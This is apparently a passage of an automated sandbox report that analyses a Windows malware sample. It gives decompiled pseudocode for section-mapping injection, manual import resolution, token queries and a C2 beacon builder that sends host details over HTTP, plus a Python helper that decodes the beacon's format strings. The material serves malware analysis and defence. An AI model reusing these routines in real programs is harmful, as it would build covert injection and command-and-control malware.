            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E4295
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E42B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 047E42BF
            • NtClose.NTDLL(?), ref: 047E42D1
            • NtClose.NTDLL(00000000), ref: 047E42DB
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
            • Instruction ID: 5f743865a2791a5221a80d3d2bae757f6c271c83dd55d47715f9e88c32974944
            • Opcode Fuzzy Hash: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
            • Instruction Fuzzy Hash: 012107B290011DBBDF119F96CD84AEEBFBDEB08750F108222FA05E6210D7759B549BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph (legend: Executed / Not Executed)

            Basic blocks and successors of E004015B0, recovered from the graph data:
            • 287: 4015b0-401607 GetSystemTimeAsFileTime -> 290, 291
            • 290: 401609 -> 291
            • 291: 40160e-401627 CreateFileMappingW -> 292, 293
            • 292: 401671-401677 GetLastError -> 296
            • 293: 401629-401632 -> 294, 295
            • 294: 401642-401650 MapViewOfFile -> 298, 299
            • 295: 401634-40163b GetLastError -> 294, 297
            • 297: 40163d-401640 -> 300
            • 298: 401660-401666 GetLastError -> 296, 300
            • 299: 401652-40165e -> 296
            • 300: 401668-40166f CloseHandle -> 296
            • 296: 401679-40167f (function exit)
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 69%
            			E047E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				void* _v48;
            				intOrPtr _v56;
            				void* __edi;
            				intOrPtr _t30;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				intOrPtr _t35;
            				intOrPtr _t36;
            				intOrPtr _t37;
            				void* _t40;
            				intOrPtr _t41;
            				int _t44;
            				intOrPtr _t45;
            				int _t48;
            				void* _t49;
            				intOrPtr _t53;
            				intOrPtr _t59;
            				intOrPtr _t63;
            				intOrPtr* _t65;
            				void* _t66;
            				intOrPtr _t71;
            				intOrPtr _t77;
            				intOrPtr _t80;
            				intOrPtr _t83;
            				int _t86;
            				intOrPtr _t88;
            				int _t91;
            				intOrPtr _t93;
            				int _t96;
            				void* _t98;
            				void* _t99;
            				void* _t103;
            				void* _t105;
            				void* _t106;
            				intOrPtr _t107;
            				long _t109;
            				intOrPtr* _t110;
            				intOrPtr* _t111;
            				long _t112;
            				int _t113;
            				void* _t114;
            				void* _t115;
            				void* _t116;
            				void* _t119;
            				void* _t120;
            				void* _t122;
            				void* _t123;
            
            				_t103 = __edx;
            				_t99 = __ecx;
            				_t120 =  &_v16;
            				_t112 = __eax;
            				_t30 =  *0x47ea3e0; // 0x5429c08
            				_v4 = _t30;
            				_v8 = 8;
            				_t98 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
            				if(_t98 != 0) {
            					if(_t112 == 0) {
            						_t112 = GetTickCount();
            					}
            					_t33 =  *0x47ea018; // 0x9e6833dc
            					asm("bswap eax");
            					_t34 =  *0x47ea014; // 0x3a87c8cd
            					asm("bswap eax");
            					_t35 =  *0x47ea010; // 0xd8d2f808
            					asm("bswap eax");
            					_t36 =  *0x47ea00c; // 0x13d015ef
            					asm("bswap eax");
            					_t37 =  *0x47ea348; // 0xc3d5a8
            					_t3 = _t37 + 0x47eb5ac; // 0x74666f73
            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x47ea02c,  *0x47ea004, _t112);
            					_t40 = E047E467F();
            					_t41 =  *0x47ea348; // 0xc3d5a8
            					_t4 = _t41 + 0x47eb575; // 0x74707526
            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
            					_t122 = _t120 + 0x38;
            					_t114 = _t113 + _t44;
            					if(_a12 != 0) {
            						_t93 =  *0x47ea348; // 0xc3d5a8
            						_t8 = _t93 + 0x47eb508; // 0x732526
            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
            						_t122 = _t122 + 0xc;
            						_t114 = _t114 + _t96;
            					}
            					_t45 =  *0x47ea348; // 0xc3d5a8
            					_t10 = _t45 + 0x47eb246; // 0x74636126
            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
            					_t123 = _t122 + 0xc;
            					_t115 = _t114 + _t48; // executed
            					_t49 = E047E472F(_t99); // executed
            					_t105 = _t49;
            					if(_t105 != 0) {
            						_t88 =  *0x47ea348; // 0xc3d5a8
            						_t12 = _t88 + 0x47eb8d0; // 0x736e6426
            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t91;
            						HeapFree( *0x47ea2d8, 0, _t105);
            					}
            					_t106 = E047E1340();
            					if(_t106 != 0) {
            						_t83 =  *0x47ea348; // 0xc3d5a8
            						_t14 = _t83 + 0x47eb8c5; // 0x6f687726
            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t86;
            						HeapFree( *0x47ea2d8, 0, _t106);
            					}
            					_t107 =  *0x47ea3cc; // 0x5429600
            					_a20 = E047E6B59(0x47ea00a, _t107 + 4);
            					_t53 =  *0x47ea36c; // 0x54295b0
            					_t109 = 0;
            					if(_t53 != 0) {
            						_t80 =  *0x47ea348; // 0xc3d5a8
            						_t17 = _t80 + 0x47eb8be; // 0x3d736f26
            						wsprintfA(_t115 + _t98, _t17, _t53);
            					}
            					if(_a20 != _t109) {
            						_t116 = RtlAllocateHeap( *0x47ea2d8, _t109, 0x800);
            						if(_t116 != _t109) {
            							E047E2915(GetTickCount());
            							_t59 =  *0x47ea3cc; // 0x5429600
            							__imp__(_t59 + 0x40);
            							asm("lock xadd [eax], ecx");
            							_t63 =  *0x47ea3cc; // 0x5429600
            							__imp__(_t63 + 0x40);
            							_t65 =  *0x47ea3cc; // 0x5429600
            							_t66 = E047E6675(1, _t103, _t98,  *_t65); // executed
            							_t119 = _t66;
            							asm("lock xadd [eax], ecx");
            							if(_t119 != _t109) {
            								StrTrimA(_t119, 0x47e9280);
            								_push(_t119);
            								_t71 = E047E7563();
            								_v20 = _t71;
            								if(_t71 != _t109) {
            									_t110 = __imp__;
            									 *_t110(_t119, _v8);
            									 *_t110(_t116, _v8);
            									_t111 = __imp__;
            									 *_t111(_t116, _v32);
            									 *_t111(_t116, _t119);
            									_t77 = E047E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
            									_v56 = _t77;
            									if(_t77 != 0 && _t77 != 0x10d2) {
            										E047E63F6();
            									}
            									HeapFree( *0x47ea2d8, 0, _v48);
            									_t109 = 0;
            								}
            								HeapFree( *0x47ea2d8, _t109, _t119);
            							}
            							RtlFreeHeap( *0x47ea2d8, _t109, _t116); // executed
            						}
            						HeapFree( *0x47ea2d8, _t109, _a12);
            					}
            					RtlFreeHeap( *0x47ea2d8, _t109, _t98); // executed
            				}
            				return _v16;
            			}

            Instruction addresses: 0x047e3ce0 - 0x047e3fa2 (the report's per-statement address column is not reproduced)

            APIs
            • RtlAllocateHeap.NTDLL ref: 047E3D08
            • GetTickCount.KERNEL32 ref: 047E3D1C
            • wsprintfA.USER32 ref: 047E3D6B
            • wsprintfA.USER32 ref: 047E3D88
            • wsprintfA.USER32 ref: 047E3DA9
            • wsprintfA.USER32 ref: 047E3DC1
            • wsprintfA.USER32 ref: 047E3DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3DF4
            • wsprintfA.USER32 ref: 047E3E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3E26
            • wsprintfA.USER32 ref: 047E3E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3E79
            • GetTickCount.KERNEL32 ref: 047E3E89
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E3E9D
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E3EBB
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
              • Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
            • StrTrimA.SHLWAPI(00000000,047E9280,00000000,05429600), ref: 047E3EED
              • Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
              • Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
              • Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 047E3F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 047E3F13
            • lstrcat.KERNEL32(00000000,?), ref: 047E3F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 047E3F24
              • Part of subcall function 047E21A6: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E2258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047E3F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E3F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,05429600), ref: 047E3F72
            • HeapFree.KERNEL32(00000000,?), ref: 047E3F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 047E3F91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID: Uet
            • API String ID: 186568778-2766386878
            • Opcode ID: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
            • Instruction ID: a707324ad6474496f5f762c362ec6f137146e14113e1838f5711cd38a177a49a
            • Opcode Fuzzy Hash: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
            • Instruction Fuzzy Hash: 677193B2500205AFC711DB67EC48EE77BE8EB8C714B058B14F909DB211E639ED05DB65
            Uniqueness

            Uniqueness Score: -1.00%
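Decoding the format-string previews in the request-builder listing above (an added analysis example; it is not output of the sample or of the sandbox). The `// 0x...` comment the decompiler prints beside each `*0x47ea348 + offset` pointer is the first dword stored at that address, little-endian, so it shows the beginning of every wsprintfA format string and, with it, the order of the fields the function appends to the request. The immediates below are copied from the listing; anything beyond the first four bytes of a string is not visible on this page and is left as `...`.

```python
import struct

# Dword immediates copied from the decompiled listing of the request builder
# (the `// 0x...` comment beside each format-string pointer), in the order the
# function passes them to wsprintfA.  The first column is the offset added to
# the base pointer at *0x47ea348 to reach the format string.
FORMAT_STRING_PREVIEWS = [
    (0x47EB575, 0x74707526),  # first field, argument from E047E467F
    (0x47EB508, 0x732526),    # emitted only when _a12 != 0
    (0x47EB246, 0x74636126),  # argument is the constant 0
    (0x47EB8D0, 0x736E6426),  # argument from E047E472F, buffer freed after
    (0x47EB8C5, 0x6F687726),  # argument from E047E1340, buffer freed after
    (0x47EB8BE, 0x3D736F26),  # argument *0x47ea36c, emitted only when non-zero
]

def decode_immediate(value):
    """Return the ASCII text encoded by a little-endian dword immediate.

    The decompiler prints the first four bytes of the string as one number,
    so the lowest byte is the first character.  A NUL inside the dword is the
    string terminator; bytes after it are padding and are dropped.
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF).split(b"\x00", 1)[0]
    if not all(0x20 <= b < 0x7F for b in raw):
        raise ValueError(f"{value:#x} does not decode to printable ASCII")
    return raw.decode("ascii")

def is_complete(value):
    """True when the dword contains the terminator, i.e. the whole format
    string is visible; False when only its first four characters are."""
    return b"\x00" in struct.pack("<I", value & 0xFFFFFFFF)

def format_string_previews(previews=FORMAT_STRING_PREVIEWS):
    """Decode every preview as (offset, text, complete) in emission order."""
    return [(off, decode_immediate(imm), is_complete(imm)) for off, imm in previews]

def query_skeleton(previews=FORMAT_STRING_PREVIEWS):
    """Skeleton of the query string the builder appends to the request.
    Truncated previews get a trailing `...` for the unseen `=%...` part."""
    return "".join(text + ("" if complete else "...")
                   for _, text, complete in format_string_previews(previews))

if __name__ == "__main__":
    for off, text, complete in format_string_previews():
        print(f"{off:#x}: {text!r}{'' if complete else ' (truncated)'}")
    # the verb immediate 0x544547 comes from E047E7B83 further down the report
    print("verb passed to HttpOpenRequestA:", decode_immediate(0x544547))
    print("query skeleton:", query_skeleton())
```

The second preview (`0x732526`) contains its terminator, so that format string is just `&%s`: the builder appends whatever `_a12` points to verbatim, while the other five fields start with a fixed parameter name (`&upt`, `&act`, `&dns`, `&who`, `&os=`) whose `=%...` tail is cut off in the four-byte preview.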

            Control-flow Graph

            C-Code - Quality: 92%
            			E047E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
            				void _v8;
            				long _v12;
            				void _v16;
            				void* _t34;
            				void* _t38;
            				void* _t40;
            				char* _t56;
            				long _t57;
            				void* _t58;
            				intOrPtr _t59;
            				long _t65;
            
            				_t65 = __esi;
            				_t58 = __ecx;
            				_v16 = 0xea60;
            				__imp__( *(__esi + 4));
            				_v12 = __eax + __eax;
            				_t56 = E047E33DC(__eax + __eax + 1);
            				if(_t56 != 0) {
            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
            						E047E61DA(_t56);
            					} else {
            						E047E61DA( *(__esi + 4));
            						 *(__esi + 4) = _t56;
            					}
            				}
            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
            				 *(_t65 + 0x10) = _t34;
            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E047E7B18) == 0xffffffff) {
            					L15:
            					return GetLastError();
            				} else {
            					ResetEvent( *(_t65 + 0x1c));
            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
            					 *(_t65 + 0x14) = _t38;
            					if(_t38 != 0 || GetLastError() == 0x3e5 && E047E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
            						_t59 =  *0x47ea348; // 0xc3d5a8
            						_t15 = _t59 + 0x47eb845; // 0x544547
            						_v8 = 0x84404000;
            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
            						 *(_t65 + 0x18) = _t40;
            						if(_t40 == 0) {
            							goto L15;
            						}
            						_t57 = 4;
            						_v12 = _t57;
            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
            							_v8 = _v8 | 0x00000100;
            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
            						}
            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
            							goto L15;
            						} else {
            							return 0;
            						}
            					} else {
            						goto L15;
            					}
            				}
            			}

            Instruction addresses: 0x047e7b83 - 0x047e7cd4 (the report's per-statement address column is not reproduced)

            APIs
